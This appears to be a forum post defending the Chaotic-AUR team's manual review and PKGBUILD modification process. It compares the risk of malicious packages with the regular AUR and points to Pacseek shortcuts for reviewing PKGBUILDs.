I feel compelled to defend the Chaotic-AUR team because I know those guys break their backs to keep that repo in good shape. It is driven by automation as you say, but there is quite a bit of time and manual effort that goes into maintaining it as well.
Users can request packages be added to the repo on the GitHub issue page (https://github.com/chaotic-aur/packages/issues), but they are not just blindly added. One of the team members looks over the PKGBUILD and determines if the package should be added or not. Often a good deal of consideration and back-and-forth discussion is involved; open up some of the issues on the page and you will see what I mean.
After a package is approved to be added to the repo, sometimes even more work is required. Here is the interferes repo:
Inside each directory is a modification which will be applied to the PKGBUILD before the build process begins. Being able to deviate from the AUR version of the PKGBUILD allows them to fix broken packages, apply changes that benefit the build routine, or add optimizations for the package itself.
The entire build process is completely transparent, and the website is actually pretty interesting to look through. For example, here is the build status page:
You can examine the pipeline, see what packages are being updated, or inspect the logs for a failed build if you want to. A lot of it goes over my head to be honest, but it’s still pretty neat I think.
Is it possible to sneak a malicious package into the Chaotic-AUR? Yes, absolutely it is. There are tons of packages in there, and a comparatively small team to look after everything. There is no way they can vouch for every package in the repo.
But if anything, it’s harder to get a malicious package into the Chaotic-AUR than the regular AUR because there is the additional barrier of the team checking over packages during the approval process, and while performing maintenance tasks. That is not to say people should use it or blindly trust the packages in it, but rather to say it is unlikely to be more risky than installing the same package from the AUR itself.
At the end of the day, as with the regular AUR, it is ultimately up to the user to review the package and inspect the PKGBUILD to decide if they would like to install a package or not.
Speaking of Pacseek and reviewing PKGBUILDs, you can review the PKGBUILD for any package from within Pacseek itself by pressing Ctrl+P.
You can also press Ctrl+O to visit whatever URL is listed for the package. A very handy tool for reviewing packages! 